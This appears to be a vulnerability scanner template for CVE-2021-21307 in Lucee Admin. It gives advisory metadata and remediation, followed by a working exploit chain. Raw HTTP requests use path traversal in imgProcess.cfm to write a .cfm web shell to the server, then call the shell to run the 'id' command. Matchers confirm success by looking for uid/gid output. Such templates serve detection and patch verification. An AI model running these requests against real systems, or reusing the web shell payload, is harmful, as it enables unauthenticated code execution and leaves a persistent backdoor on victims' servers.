id: CVE-2021-21307 info: name: Lucee Admin - Remote Code Execution author: dhiyaneshDk severity: critical description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. tags: cve,cve2021,rce,lucee,adobe requests: - raw: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded imgSrc=
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" value="5">
        #HTMLCodeFormat(myVar)#
        
- | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 matchers-condition: and matchers: - type: word words: - "uid=" - "gid=" - "groups=" part: body condition: and - type: status status: - 200 extractors: - type: regex regex: - "(u|g)id=.*" # Enhanced by mp on 2022/05/05